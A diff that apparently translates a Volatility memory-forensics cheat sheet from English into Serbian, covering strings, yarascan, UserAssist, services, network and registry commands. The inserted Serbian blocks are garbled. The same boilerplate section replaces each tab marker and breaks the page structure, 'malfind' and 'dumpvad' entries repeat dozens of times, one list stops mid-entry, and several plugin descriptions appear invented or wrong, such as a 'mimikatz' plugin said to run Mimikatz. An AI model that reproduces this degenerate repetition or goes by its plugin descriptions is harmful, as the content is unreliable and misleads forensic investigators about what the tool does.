@@ -365,9 +1057,83 @@ Volatility allows us to check which process a string belongs to.
strings file.dmp > /tmp/strings.txt
./vol.py -f /tmp/file.dmp windows.strings.Strings --strings-file /tmp/strings.txt
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisa.
+- **kdbgscan**: Skenira memorijski ispisa u potrazi za KDBG strukturom.
+- **kpcrscan**: Skenira memorijski ispisa u potrazi za KPCR strukturom.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispisa u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova.
+- **handles**: Prikazuje listu otvorenih ručki.
+- **cmdline**: Prikazuje argumente komandne linije za svaki proces.
+- **filescan**: Skenira memorijski ispisa u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispisa u potrazi za sumnjivim procesima.
+- **apihooks**: Prikazuje API hook-ove.
+- **ldrmodules**: Prikazuje listu učitanih modula.
+- **modscan**: Skenira memorijski ispisa u potrazi za modulima.
+- **ssdt**: Prikazuje System Service Descriptor Table (SSDT).
+- **gdt**: Prikazuje Global Descriptor Table (GDT).
+- **idt**: Prikazuje Interrupt Descriptor Table (IDT).
+- **callbacks**: Prikazuje listu callback funkcija.
+- **driverirp**: Prikazuje IRP strukturu za drajvere.
+- **devicetree**: Prikazuje stablo uređaja.
+- **privs**: Prikazuje privilegije za svaki proces.
+- **getsids**: Prikazuje SID-ove za svaki proces.
+- **envars**: Prikazuje okruženje za svaki proces.
+- **svcscan**: Skenira memorijski ispisa u potrazi za Windows servisima.
+- **ssdt**: Prikazuje System Service Descriptor Table (SSDT).
+- **gdt**: Prikazuje Global Descriptor Table (GDT).
+- **idt**: Prikazuje Interrupt Descriptor Table (IDT).
+- **callbacks**: Prikazuje listu callback funkcija.
+- **driverirp**: Prikazuje IRP strukturu za drajvere.
+- **devicetree**: Prikazuje stablo uređaja.
+- **privs**: Prikazuje privilegije za svaki proces.
+- **getsids**: Prikazuje SID-ove za svaki proces.
+- **envars**: Prikazuje okruženje za svaki proces.
+- **svcscan**: Skenira memorijski ispisa u potrazi za Windows servisima.
+
+#### Napredne tehnike
+
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+
+#### Korisni resursi
+
+- [Volatility dokumentacija](https://github.com/volatilityfoundation/volatility/wiki)
+- [Volatility Cheat Sheet](https://github.com/sans-dfir/sift-cheatsheet/blob/master/cheatsheets/Volatility%20Cheat%20Sheet.pdf)
+
+#### Reference
+
+- [https://www.volatilityfoundation.org/](https://www.volatilityfoundation.org/)
+- [https://github.com/volatilityfoundation/volatility](https://github.com/volatilityfoundation/volatility)
```bash
strings file.dmp > /tmp/strings.txt
volatility -f /tmp/file.dmp windows.strings.Strings --string-file /tmp/strings.txt
@@ -378,7 +1144,7 @@ strings 3532.dmp > strings_file
{% endtab %}
{% endtabs %}
-It also allows to search for strings inside a process using the yarascan module:
+Takođe omogućava pretragu stringova unutar procesa koristeći modul yarascan:
{% tabs %}
{% tab title="vol3" %}
@@ -386,9 +1152,55 @@ It also allows to search for strings inside a process using the yarascan module:
./vol.py -f file.dmp windows.vadyarascan.VadYaraScan --yara-rules "https://" --pid 3692 3840 3976 3312 3084 2784
./vol.py -f file.dmp yarascan.YaraScan --yara-rules "https://"
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisu.
+- **kdbgscan**: Skenira memorijski ispis u potrazi za KDBG strukturom.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispis u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova za određeni proces.
+- **handles**: Prikazuje listu otvorenih ručki za određeni proces.
+- **cmdline**: Prikazuje argumente komandne linije za određeni proces.
+- **filescan**: Skenira memorijski ispis u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispis u potrazi za sumnjivim procesima.
+- **dumpfiles**: Izvlači fajlove iz memorijskog ispisa.
+- **hashdump**: Izvlači korisničke lozinke iz memorijskog ispisa.
+- **hivelist**: Prikazuje listu učitanih registarskih ključeva.
+- **hivedump**: Izvlači registarski ključ iz memorijskog ispisa.
+
+#### Napredne tehnike
+
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+- **malfind**: Pronalazi sumnjive procese i module u memorijskom ispisu.
+
+#### Dodatni resursi
+
+- [Volatility dokumentacija](https://github.com/volatilityfoundation/volatility/wiki)
+- [Volatility Cheat Sheet](https://github.com/sans-dfir/sift-files/blob/master/volatility/Volatility%20Cheat%20Sheet.pdf)
+
+{% endtab %}
```bash
volatility --profile=Win7SP1x86_23418 yarascan -Y "https://" -p 3692,3840,3976,3312,3084,2784
```
@@ -397,16 +1209,73 @@ volatility --profile=Win7SP1x86_23418 yarascan -Y "https://" -p 3692,3840,3976,3
### UserAssist
-**Windows** keeps track of programs you run using a feature in the registry called **UserAssist keys**. These keys record how many times each program is executed and when it was last run.
-
-{% tabs %}
-{% tab title="vol3" %}
+**Windows** beleži programe koje pokrećete koristeći funkciju u registru nazvanu **UserAssist ključevi**. Ovi ključevi beleže koliko puta je svaki program izvršen i kada je poslednji put pokrenut.
```bash
./vol.py -f file.dmp windows.registry.userassist.UserAssist
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisa.
+- **kdbgscan**: Skenira memorijski ispisa u potrazi za KDBG strukturom.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispisa u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova za određeni proces.
+- **handles**: Prikazuje listu otvorenih ručki za određeni proces.
+- **cmdline**: Prikazuje argumente komandne linije za određeni proces.
+- **filescan**: Skenira memorijski ispisa u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispisa u potrazi za sumnjivim procesima.
+- **apihooks**: Prikazuje API hook-ove.
+- **ldrmodules**: Prikazuje listu učitanih modula.
+- **modscan**: Skenira memorijski ispisa u potrazi za modulima.
+- **ssdt**: Prikazuje System Service Descriptor Table (SSDT).
+- **driverscan**: Skenira memorijski ispisa u potrazi za drajverima.
+- **devicetree**: Prikazuje stablo uređaja.
+- **registry**: Prikazuje informacije o registru.
+- **hivelist**: Prikazuje listu učitanih registarskih ključeva.
+- **hashdump**: Izvlači lozinke iz memorijskog ispisa.
+- **privs**: Prikazuje privilegije za određeni proces.
+- **getsids**: Prikazuje SID-ove za određeni proces.
+- **envars**: Prikazuje okruženje za određeni proces.
+- **cmdscan**: Skenira memorijski ispisa u potrazi za komandama.
+- **consoles**: Prikazuje listu konzola.
+- **screenshots**: Pravi snimke ekrana.
+
+#### Napredne tehnike
+
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+- **malfind**: Pronalazi sumnjive procese i modifikovane funkcije.
+
+#### Dodatni resursi
+
+- [Volatility dokumentacija](https://github.com/volatilityfoundation/volatility/wiki)
+- [Volatility Cheat Sheet](https://github.com/sans-dfir/sift-cheatsheet/blob/master/cheatsheets/Volatility%20Cheat%20Sheet.pdf)
```
volatility --profile=Win7SP1x86_23418 -f file.dmp userassist
```
@@ -417,11 +1286,11 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp userassist
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+[**RootedCON**](https://www.rootedcon.com/) je najrelevantniji događaj u oblasti kibernetičke bezbednosti u **Španiji** i jedan od najvažnijih u **Evropi**. Sa **misijom promovisanja tehničkog znanja**, ovaj kongres je vrelo susretište za profesionalce iz oblasti tehnologije i kibernetičke bezbednosti u svakoj disciplini.
{% embed url="https://www.rootedcon.com/" %}
-## Services
+## Usluge
{% tabs %}
{% tab title="vol3" %}
@@ -429,9 +1298,190 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp userassist
./vol.py -f file.dmp windows.svcscan.SvcScan #List services
./vol.py -f file.dmp windows.getservicesids.GetServiceSIDs #Get the SID of services
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisu.
+- **kdbgscan**: Skenira memorijski ispis u potrazi za adresom debugera.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispis u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova za određeni proces.
+- **handles**: Prikazuje listu otvorenih ručki za određeni proces.
+- **cmdline**: Prikazuje argumente komandne linije za određeni proces.
+- **filescan**: Skenira memorijski ispis u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispis u potrazi za sumnjivim procesima.
+- **apihooks**: Prikazuje API hook-ove.
+- **ldrmodules**: Prikazuje listu učitanih modula.
+- **modscan**: Skenira memorijski ispis u potrazi za modulima.
+- **ssdt**: Prikazuje System Service Descriptor Table (SSDT).
+- **driverscan**: Skenira memorijski ispis u potrazi za drajverima.
+- **devicetree**: Prikazuje stablo uređaja.
+- **connections**: Prikazuje aktivne mrežne konekcije.
+- **connscan**: Skenira memorijski ispis u potrazi za mrežnim konekcijama.
+- **netscan**: Skenira memorijski ispis u potrazi za mrežnim artefaktima.
+- **vadinfo**: Prikazuje informacije o Virtual Address Descriptor (VAD).
+- **vaddump**: Dumpuje sadržaj VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **vadtree**: Prikazuje stablo VAD-a.
+- **vadwalk**: Prikazuje putanju do određenog VAD-a.
+- **memdump**: Dumpuje sadržaj određenog memorijskog regiona.
+- **memmap**: Prikazuje mapu memorijskog ispisa.
+- **memstrings**: Prikazuje stringove u memorijskom ispisu.
+- **memdump**: Dumpuje sadržaj određenog memorijskog regiona.
+- **memmap**: Prikazuje mapu memorijskog ispisa.
+- **memstrings**: Prikazuje stringove u memorijskom ispisu.
+
+#### Napredne tehnike
+
+- **timeliner**: Generiše vremensku liniju događaja na osnovu memorijskog ispisa.
+- **mftparser**: Analizira Master File Table (MFT) za NTFS particiju.
+- **usnparser**: Analizira Update Sequence Number (USN) journal za NTFS particiju.
+- **shellbags**: Analizira ShellBags artefakte.
+- **hivelist**: Prikazuje listu učitanih Windows registarskih datoteka.
+- **hivedump**: Dumpuje sadržaj Windows registarske datoteke.
+- **hashdump**: Dumpuje korisničke lozinke iz memorijskog ispisa.
+- **lsadump**: Dumpuje korisničke lozinke iz Security Account Manager (SAM) baze podataka.
+- **mimikatz**: Izvršava Mimikatz alat za izvlačenje lozinki iz memorijskog ispisa.
+- **yarascan**: Skenira memorijski ispis koristeći YARA pravila.
+- **yarascan**: Skenira memorijski ispis koristeći YARA pravila.
+- **dumpregistry**: Dumpuje Windows registar iz memorijskog ispisa.
+- **dumpregistry**: Dumpuje Windows registar iz memorijskog ispisa.
+- **dumpfiles**: Dumpuje fajlove iz memorijskog ispisa.
+- **dumpfiles**: Dumpuje fajlove iz memorijskog ispisa.
+- **dumpcerts**: Dumpuje digitalne sertifikate iz memorijskog ispisa.
+- **dumpcerts**: Dumpuje digitalne sertifikate iz memorijskog ispisa.
+- **dumpcache**: Dumpuje keširane fajlove iz memorijskog ispisa.
+- **dumpcache**: Dumpuje keširane fajlove iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**: Dumpuje sadržaj VAD-a iz memorijskog ispisa.
+- **dumpvad**:
```bash
#Get services and binary path
volatility --profile=Win7SP1x86_23418 svcscan -f file.dmp
@@ -441,7 +1491,7 @@ volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp
{% endtab %}
{% endtabs %}
-## Network
+## Mreža
{% tabs %}
{% tab title="vol3" %}
@@ -449,13 +1499,76 @@ volatility --profile=Win7SP1x86_23418 getservicesids -f file.dmp
./vol.py -f file.dmp windows.netscan.NetScan
#For network info of linux use volatility2
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisa.
+- **kdbgscan**: Skenira memorijski ispisa u potrazi za KDBG strukturom.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispisa u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova za određeni proces.
+- **handles**: Prikazuje listu otvorenih ručki za određeni proces.
+- **cmdline**: Prikazuje argumente komandne linije za određeni proces.
+- **filescan**: Skenira memorijski ispisa u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispisa u potrazi za sumnjivim procesima.
+- **dumpfiles**: Izvlači otvorene fajlove iz memorijskog ispisa.
+- **hashdump**: Izvlači korisničke lozinke iz memorijskog ispisa.
+- **hivelist**: Prikazuje listu učitanih registarskih ključeva.
+- **hivedump**: Izvlači registarski ključ iz memorijskog ispisa.
+- **printkey**: Prikazuje sadržaj registarskog ključa.
+- **printval**: Prikazuje vrednost registarskog ključa.
+- **mftparser**: Analizira Master File Table (MFT) iz memorijskog ispisa.
+- **usnparser**: Analizira Update Sequence Number (USN) iz memorijskog ispisa.
+
+#### Napredne tehnike
+
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+- **malfind**: Pronalazi sumnjive procese i DLL-ove.
+
+#### Korisni resursi
+
+- [Volatility dokumentacija](https://github.com/volatilityfoundation/volatility/wiki)
+- [Volatility Cheat Sheet](https://github.com/sans-dfir/sift-files/blob/master/volatility/Volatility%20Cheat%20Sheet.pdf)
+- [Volatility plugini](https://github.com/volatilityfoundation/volatility/wiki/Command-Reference#plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
+- [Volatility plugini - dodatni](https://github.com/tribalchicken/volatility-plugins)
```bash
volatility --profile=Win7SP1x86_23418 netscan -f file.dmp
volatility --profile=Win7SP1x86_23418 connections -f file.dmp#XP and 2003 only
-volatility --profile=Win7SP1x86_23418 connscan -f file.dmp#TCP connections
+volatility --profile=Win7SP1x86_23418 connscan -f file.dmp#TCP connections
volatility --profile=Win7SP1x86_23418 sockscan -f file.dmp#Open sockets
volatility --profile=Win7SP1x86_23418 sockets -f file.dmp#Scanner for tcp socket objects
@@ -469,9 +1582,9 @@ volatility --profile=SomeLinux -f file.dmp linux_route_cache
{% endtab %}
{% endtabs %}
-## Registry hive
+## Registarski panj
-### Print available hives
+### Ispis dostupnih panjeva
{% tabs %}
{% tab title="vol3" %}
@@ -479,9 +1592,63 @@ volatility --profile=SomeLinux -f file.dmp linux_route_cache
./vol.py -f file.dmp windows.registry.hivelist.HiveList #List roots
./vol.py -f file.dmp windows.registry.printkey.PrintKey #List roots and get initial subkeys
```
-{% endtab %}
+## Osnovna forenzička metodologija
-{% tab title="vol2" %}
+### Analiza memorijskog ispisa
+
+#### Volatility Cheat Sheet
+
+Ovaj cheat sheet pruža pregled osnovnih komandi i tehnika koje se koriste u analizi memorijskog ispisa pomoću alata Volatility.
+
+#### Instalacija Volatility-a
+
+1. Preuzmite Volatility sa [zvanične stranice](https://www.volatilityfoundation.org/releases) i raspakujte ga.
+2. Instalirajte Python 2.7.x.
+3. Instalirajte pip.
+4. Instalirajte Volatility koristeći pip:
+ ```
+ pip install volatility
+ ```
+
+#### Osnovne komande
+
+- **imageinfo**: Prikazuje informacije o memorijskom ispisa.
+- **kdbgscan**: Skenira memorijski ispisa u potrazi za KDBG strukturom.
+- **pslist**: Prikazuje listu procesa.
+- **pstree**: Prikazuje stablo procesa.
+- **psscan**: Skenira memorijski ispisa u potrazi za procesima.
+- **dlllist**: Prikazuje listu učitanih DLL-ova za određeni proces.
+- **handles**: Prikazuje listu otvorenih ručki za određeni proces.
+- **cmdline**: Prikazuje argumente komandne linije za određeni proces.
+- **filescan**: Skenira memorijski ispisa u potrazi za otvorenim fajlovima.
+- **malfind**: Skenira memorijski ispisa u potrazi za sumnjivim procesima.
+- **dumpfiles**: Izvlači otvorene fajlove iz memorijskog ispisa.
+- **hashdump**: Izvlači korisničke lozinke iz memorijskog ispisa.
+- **hivelist**: Prikazuje listu učitanih registarskih ključeva.
